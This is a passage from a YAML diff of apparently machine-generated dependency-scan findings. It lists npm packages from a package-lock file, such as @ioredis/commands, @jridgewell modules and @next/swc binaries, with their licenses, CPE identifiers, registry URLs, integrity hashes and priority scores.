syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40img/sharp-win32-ia32@0.34.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@img/sharp-win32-ia32/-/sharp-win32-ia32-0.34.5.tgz + integrity: sha512-FV9m/7NmeCmSHDD5j4+4pNI8Cp3aW+JvLoXcTUo0IqyjSfAZJ8dIUmijx1qaJsIiU+Hosw6xM5KijAWRJCSgNg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: ab5d55aa7d2a17c8 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @img/sharp-win32-x64 0.34.5' + title: '@img/sharp-win32-x64 0.34.5' + description: 'Package discovered: @img/sharp-win32-x64 0.34.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: e8052476c35410ff + name: '@img/sharp-win32-x64' + version: 0.34.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 AND LGPL-3.0-or-later + spdxExpression: Apache-2.0 AND LGPL-3.0-or-later + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@img\/sharp-win32-x64:\@img\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-win32-x64:\@img\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_win32_x64:\@img\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_win32_x64:\@img\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-win32:\@img\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-win32:\@img\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_win32:\@img\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_win32:\@img\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40img/sharp-win32-x64@0.34.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@img/sharp-win32-x64/-/sharp-win32-x64-0.34.5.tgz + integrity: sha512-+29YMsqY2/9eFEiW93eqWnuLcWcufowXewwSNIT6UwZdUUCrM3oFjMWH/Z6/TMmb4hlFenmfAVbpWeup2jryCw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: ab76bfe90efb399f + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @ioredis/commands 1.5.1' + title: '@ioredis/commands 1.5.1' + description: 'Package discovered: @ioredis/commands 1.5.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 58cb7ee4da366532 + name: '@ioredis/commands' + version: 1.5.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@ioredis\/commands:\@ioredis\/commands:1.5.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40ioredis/commands@1.5.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@ioredis/commands/-/commands-1.5.1.tgz + integrity: sha512-JH8ZL/ywcJyR9MmJ5BNqZllXNZQqQbnVZOqpPQqE1vHiFgAw4NHbvE0FOduNU8IX9babitBT46571OnPTT0Zcw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 2bd603d91182e49c + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @isaacs/cliui 8.0.2' + title: '@isaacs/cliui 8.0.2' + description: 'Package discovered: @isaacs/cliui 8.0.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 1157d16cad8b2ffc + name: '@isaacs/cliui' + version: 8.0.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@isaacs\/cliui:\@isaacs\/cliui:8.0.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40isaacs/cliui@8.0.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@isaacs/cliui/-/cliui-8.0.2.tgz + integrity: sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA== + dependencies: + string-width: ^5.1.2 + string-width-cjs: npm:string-width@^4.2.0 + strip-ansi: ^7.0.1 + strip-ansi-cjs: npm:strip-ansi@^6.0.1 + wrap-ansi: ^8.1.0 + wrap-ansi-cjs: npm:wrap-ansi@^7.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 5c9bb2e998c9fa3b + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @jridgewell/gen-mapping 0.3.13' + title: '@jridgewell/gen-mapping 0.3.13' + description: 'Package discovered: @jridgewell/gen-mapping 0.3.13' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 93582717df76767f + name: '@jridgewell/gen-mapping' + version: 0.3.13 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@jridgewell\/gen-mapping:\@jridgewell\/gen-mapping:0.3.13:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@jridgewell\/gen-mapping:\@jridgewell\/gen_mapping:0.3.13:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@jridgewell\/gen_mapping:\@jridgewell\/gen-mapping:0.3.13:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@jridgewell\/gen_mapping:\@jridgewell\/gen_mapping:0.3.13:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@jridgewell\/gen:\@jridgewell\/gen-mapping:0.3.13:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@jridgewell\/gen:\@jridgewell\/gen_mapping:0.3.13:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40jridgewell/gen-mapping@0.3.13 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.13.tgz + integrity: sha512-2kkt/7niJ6MgEPxF0bYdQ6etZaA+fQvDcLKckhy1yIQOzaoKjBBjSj63/aLVjYE3qhRt5dvM+uUyfCg6UKCBbA== + dependencies: + '@jridgewell/sourcemap-codec': ^1.5.0 + '@jridgewell/trace-mapping': ^0.3.24 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 843924b3be64bc5f + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @jridgewell/resolve-uri 3.1.2' + title: '@jridgewell/resolve-uri 3.1.2' + description: 'Package discovered: @jridgewell/resolve-uri 3.1.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 82452eb5459f3fba + name: '@jridgewell/resolve-uri' + version: 3.1.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@jridgewell\/resolve-uri:\@jridgewell\/resolve-uri:3.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@jridgewell\/resolve-uri:\@jridgewell\/resolve_uri:3.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@jridgewell\/resolve_uri:\@jridgewell\/resolve-uri:3.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@jridgewell\/resolve_uri:\@jridgewell\/resolve_uri:3.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@jridgewell\/resolve:\@jridgewell\/resolve-uri:3.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@jridgewell\/resolve:\@jridgewell\/resolve_uri:3.1.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40jridgewell/resolve-uri@3.1.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.2.tgz + integrity: sha512-bRISgCIjP20/tbWSPWMEi54QVPRZExkuD9lJL+UIxUKtwVJA8wW1Trb1jMs1RFXo1CBTNZ/5hpC9QvmKWdopKw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: c541a28057efb07d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @jridgewell/sourcemap-codec 1.5.5' + title: '@jridgewell/sourcemap-codec 1.5.5' + description: 'Package discovered: @jridgewell/sourcemap-codec 1.5.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 47804e8101ff9015 + name: '@jridgewell/sourcemap-codec' + version: 1.5.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@jridgewell\/sourcemap-codec:\@jridgewell\/sourcemap-codec:1.5.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@jridgewell\/sourcemap-codec:\@jridgewell\/sourcemap_codec:1.5.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@jridgewell\/sourcemap_codec:\@jridgewell\/sourcemap-codec:1.5.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@jridgewell\/sourcemap_codec:\@jridgewell\/sourcemap_codec:1.5.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@jridgewell\/sourcemap:\@jridgewell\/sourcemap-codec:1.5.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@jridgewell\/sourcemap:\@jridgewell\/sourcemap_codec:1.5.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40jridgewell/sourcemap-codec@1.5.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.5.5.tgz + integrity: sha512-cYQ9310grqxueWbl+WuIUIaiUaDcj7WOq5fVhEljNVgRfOUhY9fy2zTvfoqWsnebh8Sl70VScFbICvJnLKB0Og== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 17f518740ec1a2d8 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @jridgewell/trace-mapping 0.3.31' + title: '@jridgewell/trace-mapping 0.3.31' + description: 'Package discovered: @jridgewell/trace-mapping 0.3.31' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: d2b0bb94bbc32d3e + name: '@jridgewell/trace-mapping' + version: 0.3.31 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@jridgewell\/trace-mapping:\@jridgewell\/trace-mapping:0.3.31:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@jridgewell\/trace-mapping:\@jridgewell\/trace_mapping:0.3.31:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@jridgewell\/trace_mapping:\@jridgewell\/trace-mapping:0.3.31:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@jridgewell\/trace_mapping:\@jridgewell\/trace_mapping:0.3.31:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@jridgewell\/trace:\@jridgewell\/trace-mapping:0.3.31:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@jridgewell\/trace:\@jridgewell\/trace_mapping:0.3.31:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40jridgewell/trace-mapping@0.3.31 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.31.tgz + integrity: sha512-zzNR+SdQSDJzc8joaeP8QQoCQr8NuYx2dIIytl1QeBEZHJ9uW6hebsrYgbz8hJwUQao3TWCMtmfV8Nu1twOLAw== + dependencies: + '@jridgewell/resolve-uri': ^3.1.0 + '@jridgewell/sourcemap-codec': ^1.4.14 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 104bcdf3fd6a7ac2 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @js-sdsl/ordered-map 4.4.2' + title: '@js-sdsl/ordered-map 4.4.2' + description: 'Package discovered: @js-sdsl/ordered-map 4.4.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 886fcbec7936d83f + name: '@js-sdsl/ordered-map' + version: 4.4.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@js-sdsl\/ordered-map:\@js-sdsl\/ordered-map:4.4.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@js-sdsl\/ordered-map:\@js_sdsl\/ordered_map:4.4.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@js_sdsl\/ordered_map:\@js-sdsl\/ordered-map:4.4.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@js_sdsl\/ordered_map:\@js_sdsl\/ordered_map:4.4.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@js-sdsl\/ordered:\@js-sdsl\/ordered-map:4.4.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@js-sdsl\/ordered:\@js_sdsl\/ordered_map:4.4.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@js_sdsl\/ordered:\@js-sdsl\/ordered-map:4.4.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@js_sdsl\/ordered:\@js_sdsl\/ordered_map:4.4.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@js:\@js-sdsl\/ordered-map:4.4.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@js:\@js_sdsl\/ordered_map:4.4.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40js-sdsl/ordered-map@4.4.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@js-sdsl/ordered-map/-/ordered-map-4.4.2.tgz + integrity: sha512-iUKgm52T8HOE/makSxjqoWhe95ZJA1/G1sYsGev2JDKUSS14KAgg1LHb+Ba+IPow0xflbnSkOsZcO08C7w1gYw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 9fea893a2745b477 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @next/env 14.2.3' + title: '@next/env 14.2.3' + description: 'Package discovered: @next/env 14.2.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 18ad44792e37660e + name: '@next/env' + version: 14.2.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@next\/env:\@next\/env:14.2.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40next/env@14.2.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@next/env/-/env-14.2.3.tgz + integrity: sha512-W7fd7IbkfmeeY2gXrzJYDx8D2lWKbVoTIj1o1ScPHNzvp30s1AuoEFSdr39bC5sjxJaxTtq3OTCZboNp0lNWHA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 258c6f6b4bc11247 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @next/swc-darwin-arm64 14.2.3' + title: '@next/swc-darwin-arm64 14.2.3' + description: 'Package discovered: @next/swc-darwin-arm64 14.2.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: bdb25bdc1adfe20f + name: '@next/swc-darwin-arm64' + version: 14.2.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@next\/swc-darwin-arm64:\@next\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-darwin-arm64:\@next\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_darwin_arm64:\@next\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_darwin_arm64:\@next\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-darwin:\@next\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-darwin:\@next\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_darwin:\@next\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_darwin:\@next\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40next/swc-darwin-arm64@14.2.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@next/swc-darwin-arm64/-/swc-darwin-arm64-14.2.3.tgz + integrity: sha512-3pEYo/RaGqPP0YzwnlmPN2puaF2WMLM3apt5jLW2fFdXD9+pqcoTzRk+iZsf8ta7+quAe4Q6Ms0nR0SFGFdS1A== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 297b85bfc16e4adc + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @next/swc-darwin-x64 14.2.3' + title: '@next/swc-darwin-x64 14.2.3' + description: 'Package discovered: @next/swc-darwin-x64 14.2.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: b0a8be32ec095ef0 + name: '@next/swc-darwin-x64' + version: 14.2.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@next\/swc-darwin-x64:\@next\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-darwin-x64:\@next\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_darwin_x64:\@next\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_darwin_x64:\@next\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-darwin:\@next\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-darwin:\@next\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_darwin:\@next\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_darwin:\@next\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40next/swc-darwin-x64@14.2.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@next/swc-darwin-x64/-/swc-darwin-x64-14.2.3.tgz + integrity: sha512-6adp7waE6P1TYFSXpY366xwsOnEXM+y1kgRpjSRVI2CBDOcbRjsJ67Z6EgKIqWIue52d2q/Mx8g9MszARj8IEA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: eaf37f3f72892d80 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @next/swc-linux-arm64-gnu 14.2.3' + title: '@next/swc-linux-arm64-gnu 14.2.3' + description: 'Package discovered: @next/swc-linux-arm64-gnu 14.2.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: b768ca89954904c7 + name: '@next/swc-linux-arm64-gnu' + version: 14.2.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@next\/swc-linux-arm64-gnu:\@next\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-linux-arm64-gnu:\@next\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_linux_arm64_gnu:\@next\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_linux_arm64_gnu:\@next\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-linux-arm64:\@next\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-linux-arm64:\@next\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: 